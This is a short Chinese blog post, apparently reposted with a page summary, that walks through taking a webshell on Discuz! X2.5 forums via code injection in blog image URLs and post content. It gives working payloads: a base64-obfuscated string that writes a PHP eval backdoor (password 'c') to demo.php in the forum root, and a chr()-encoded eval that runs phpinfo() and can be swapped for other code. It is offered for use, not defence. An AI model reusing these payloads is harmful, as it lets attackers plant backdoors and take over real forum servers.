直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。
1.注册任意账户
2.登陆用户,发表blog日志(注意是日志)
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4.访问日志,论坛根目录下生成demo.php,一句话密码C
这个必须是要开启seo
在这个地方。二个的都是这个地方。
最新更新的是能直接在贴子里面拿shell。。
利用方式也并非非得发blog,也不是非得发网络图片,详细的利用我是比如随便发个贴子,内容
${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}
然后给他加上任意超链接,发布即可phpinfo(),
这个自己换成char就可以了
自己敢兴趣的怎么网上搜。好多的。
文章介绍了如何通过注册任意账户、发表博客日志并添加网络图片来获取DZ!2.5后台shell的方法,并提到了最新更新允许在帖子中直接获取shell。详细步骤包括注册、登陆、发表包含特定代码的日志或贴子,以及访问日志生成shell文件。此操作需要网站SEO功能开启。



526

被折叠的 条评论
为什么被折叠?



